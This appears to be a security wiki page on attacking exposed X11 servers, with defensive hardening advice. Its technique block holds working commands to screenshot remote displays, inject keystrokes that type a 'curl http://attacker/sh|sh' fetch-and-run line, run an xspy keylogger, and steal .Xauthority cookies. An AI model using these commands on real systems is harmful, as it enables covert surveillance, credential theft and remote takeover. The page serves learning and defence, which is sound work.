X11 Server Attacks
TL;DR: An X server on TCP 6000 with
xhost +lets any remote host read the screen, inject keystrokes, and log everything the user types — the original 1990s threat model is still shipping on lab Linux desktops.
What it is
The X Window System separates display servers (which own the keyboard, mouse, and framebuffer) from clients (the apps). Authentication is either host-based (xhost) or cookie-based (MIT-MAGIC-COOKIE-1 from ~/.Xauthority). When a user types xhost + to make a quick demo work, the server happily accepts any client from anywhere, with full input and output access to every window.
Preconditions / where it applies
- TCP/6000 + display number (6001, 6002 for additional displays)
- Modern distros disable TCP listen by default (
-nolisten tcpin Xorg) but it is re-enabled on multi-user lab boxes, jump hosts, and some thin clients - SSH X11-forwarding cookies on shared bastions can be stolen from
/tmp/.X11-unixsockets - Found on academic clusters, broadcast/editing workstations, CAD seats, and old SunRay environments
Technique
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Scan
nmap -p 6000-6005 --script x11-access 10.0.0.60
# Quick smoke test — only works with xhost + or stolen cookie
xdpyinfo -display 10.0.0.60:0
# Screenshot the remote desktop
xwd -display 10.0.0.60:0 -root -out screen.xwd
convert screen.xwd screen.png
# Inject keystrokes — spawn a shell in whatever terminal is focused
DISPLAY=10.0.0.60:0 xdotool key ctrl+alt+t
DISPLAY=10.0.0.60:0 xdotool type --delay 50 'curl http://attacker/sh|sh'
DISPLAY=10.0.0.60:0 xdotool key Return
# Keylogger
git clone https://github.com/magnumripper/xspy && cd xspy && make
./xspy -display 10.0.0.60:0
# Cookie theft on a shared host
cp /home/victim/.Xauthority /tmp/x && DISPLAY=:10 XAUTHORITY=/tmp/x xdotool key Return
Detection and defence
- Run Xorg with
-nolisten tcp(default on Debian, Fedora, Ubuntu since 2018) - Use Wayland where possible — there is no equivalent global input bus
- For SSH X11 forwarding prefer
ForwardX11Trusted noso the SECURITY extension caps capabilities - Never
xhost +— usexauth addwith a per-session cookie instead - Monitor for unexpected TCP listens on 6000-6005 with
ss -tlnp
References
- X.Org security advisory archive — protocol-level CVEs
- Wayland portability FAQ — why Wayland blocks global input capture
See also: exposed-services, port-scanning.